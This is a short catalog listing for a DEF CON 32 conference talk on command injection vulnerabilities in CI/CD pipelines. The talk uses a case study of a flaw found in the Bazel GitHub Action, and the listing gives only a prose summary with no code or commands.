Overview
Explore critical security vulnerabilities in CI/CD pipelines through this DEF CON 32 conference talk that demonstrates how command injection in pipeline components can compromise major projects. Learn from a detailed case study of a command injection vulnerability discovered in Bazel GitHub Action, Google's flagship project, and witness live demonstrations showing how attackers can exploit pipeline weaknesses to inject malicious code into widely-used repositories. Gain practical knowledge about securing CI/CD pipelines and implementing effective protection strategies to safeguard development projects from similar security threats.
Syllabus
DEF CON 32 - Your CI CD Pipeline Is Vulnerable, But It's Not Your Fault - Elad Pticha, Oreen Livni
Taught by
DEFCONConference